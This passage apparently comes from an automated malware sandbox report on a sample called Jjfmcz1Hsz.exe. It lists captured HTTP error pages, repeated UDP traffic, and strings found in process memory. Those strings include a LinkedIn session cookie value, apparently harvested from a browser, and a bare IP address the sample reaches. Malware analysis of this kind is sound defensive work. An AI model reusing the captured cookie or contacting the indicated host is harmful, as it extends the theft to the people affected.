      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:20:04 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 05 Dec 2022 14:20:10 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 05 Dec 2022 14:20:12 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 05 Dec 2022 14:20:14 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:20:21 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:20:23 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:20:26 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:20:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 01 May 2020 23:50:34 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: help.exe, 00000013.00000002.5835102674.0000000003E1C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000000.1992640054.000000002903C000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
      Source: help.exe, 00000013.00000003.1922804413.0000000007D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
      Source: help.exe, 00000013.00000003.1922804413.0000000007D7D000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5841740291.0000000007D98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
      Source: help.exe, 00000013.00000002.5836975372.0000000004B34000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://45.122.138.45/favicon.ico
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
      Source: Jjfmcz1Hsz.exe, 0000000B.00000003.1182355015.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1171500382.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1181384461.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1177181129.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1325265421.0000000001832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: Jjfmcz1Hsz.exe, 0000000B.00000003.1182355015.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1171500382.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1181384461.000000000182F000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1177181129.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1325265421.0000000001832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: explorer.exe, 0000001D.00000000.1482506374.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1607755234.000000000FF66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1679355249.000000000FF66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1609251797.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680572544.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1479868399.000000000FF66000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://customersupport.networksolutions.com/article.php?id=306
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/7417/png.js
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/7985/headerstrip.gif)
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/7985/logo.png
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/7985/netsol-logos.jpg
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/8932/arrows.jpg)
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/8934/frt_arr.jpg)
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/8934/lst_arr.jpg)
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/8934/srch-bg.gif)
      Source: Jjfmcz1Hsz.exe, 0000000B.00000001.981436197.0000000000649000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: Jjfmcz1Hsz.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: explorer.exe, 0000001D.00000000.1482506374.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1607755234.000000000FF66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1679355249.000000000FF66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1609251797.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680572544.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1479868399.000000000FF66000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
